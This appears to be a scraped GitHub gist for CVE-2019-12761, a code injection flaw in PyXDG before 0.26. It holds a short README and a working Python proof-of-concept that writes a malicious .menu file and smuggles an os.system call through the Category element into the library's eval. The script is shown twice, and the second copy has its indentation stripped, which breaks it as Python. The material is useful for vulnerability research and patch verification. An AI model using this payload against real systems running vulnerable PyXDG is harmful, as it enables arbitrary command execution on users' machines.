dhondta/README.md

## README.md

      
    Raw
  

              README.md
            
          
    CVE-2019-12761

Description

A code injection issue was discovered in PyXDG before 0.26 via crafted Python code in a Category element of a Menu XML document in a .menu file. XDG_CONFIG_DIRS must be set up to trigger xdg.Menu.parse parsing within the directory containing this file. This is due to a lack of sanitization in xdg/Menu.py before an eval call.
References


https://snyk.io/vuln/SNYK-PYTHON-PYXDG-174562


## poc-python-xdg-0.25.py
#!/usr/bin/python3
import os
import shutil
from xdg.BaseDirectory import xdg_config_dirs
from xdg.Menu import parse

TEMP = "/tmp/poc-xdg"
MENU = "gnome-evil.menu"
RSLT = "{}/result.txt".format(TEMP)
CMD  = "ls"

evil_menu = """<!DOCTYPE Menu PUBLIC "-//freedesktop//DTD Menu 1.0//EN" "http://www.freedesktop.org/standards/menu-spec/1.0/menu.dtd">
<Menu>
  <LegacyDir>{}</LegacyDir>
  <Include>
    <Category>' or __import__('os').system('{} > {}') or '</Category>
  </Include>
</Menu>
""".format(TEMP, CMD, RSLT)

empy_shortcut = "[Desktop Entry]"

# 1. create a temporary folder
if not os.path.exists(TEMP):
    os.makedirs(TEMP)
# 2. modify XDG_CONFIG_DIRS to also parse the newly created temporary location
xdg_config_dirs += [TEMP]
# 3. create the payload (it requires to be put in a 'menu' subfolder)
_ = "{}/menus".format(TEMP)
if not os.path.exists(_):
    os.makedirs(_)
with open("{}/{}".format(_, MENU), 'w') as f:
    f.write(evil_menu)
# 4. create an empty shortcut (required for parsing a menu entry and leading to
#     the eval() statement)
with open("{}/sample.desktop".format(TEMP), 'w') as f:
    f.write(empy_shortcut)
# 5. trigger parsing (this will automatically search in every location from
#     XDG_CONFIG_DIRS for the given filename)
parse(MENU)
# 6. read injected command's result
with open(RSLT) as f:
    print(f.read())
# 7. cleanup
shutil.rmtree(TEMP)
	#!/usr/bin/python3
	import os
	import shutil
	from xdg.BaseDirectory import xdg_config_dirs
	from xdg.Menu import parse

	TEMP = "/tmp/poc-xdg"
	MENU = "gnome-evil.menu"
	RSLT = "{}/result.txt".format(TEMP)
	CMD = "ls"

	evil_menu = """<!DOCTYPE Menu PUBLIC "-//freedesktop//DTD Menu 1.0//EN" "http://www.freedesktop.org/standards/menu-spec/1.0/menu.dtd">
	<Menu>
	<LegacyDir>{}</LegacyDir>
	<Include>
	<Category>' or __import__('os').system('{} > {}') or '</Category>
	</Include>
	</Menu>
	""".format(TEMP, CMD, RSLT)

	empy_shortcut = "[Desktop Entry]"

	# 1. create a temporary folder
	if not os.path.exists(TEMP):
	os.makedirs(TEMP)
	# 2. modify XDG_CONFIG_DIRS to also parse the newly created temporary location
	xdg_config_dirs += [TEMP]
	# 3. create the payload (it requires to be put in a 'menu' subfolder)
	_ = "{}/menus".format(TEMP)
	if not os.path.exists(_):
	os.makedirs(_)
	with open("{}/{}".format(_, MENU), 'w') as f:
	f.write(evil_menu)
	# 4. create an empty shortcut (required for parsing a menu entry and leading to
	# the eval() statement)
	with open("{}/sample.desktop".format(TEMP), 'w') as f:
	f.write(empy_shortcut)
	# 5. trigger parsing (this will automatically search in every location from
	# XDG_CONFIG_DIRS for the given filename)
	parse(MENU)
	# 6. read injected command's result
	with open(RSLT) as f:
	print(f.read())
	# 7. cleanup
	shutil.rmtree(TEMP)